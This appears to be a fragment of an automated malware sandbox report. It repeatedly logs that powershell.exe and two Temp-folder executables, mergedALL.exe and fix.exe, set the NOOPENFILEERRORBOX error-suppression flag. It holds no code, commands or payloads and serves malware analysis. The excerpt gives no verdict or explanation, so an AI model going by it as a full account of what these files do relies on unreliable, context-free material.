Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fix.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fix.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fix.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fix.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fix.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fix.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fix.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fix.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fix.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fix.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fix.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fix.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fix.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fix.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fix.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fix.exe Process information set: NOOPENFILEERRORBOX
